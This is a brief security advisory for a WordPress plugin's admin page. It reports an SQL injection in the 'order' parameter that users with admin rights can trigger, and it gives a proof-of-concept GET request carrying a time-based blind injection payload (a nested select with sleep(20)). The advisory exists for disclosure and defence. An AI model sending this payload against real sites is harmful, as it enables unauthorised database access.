The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
1. Send `GET /wp-admin/admin.php?page=querywall&orderby=date_time_gmt&order=desc%2c(select*from(select(sleep(20)))a)`
2. See SQL execution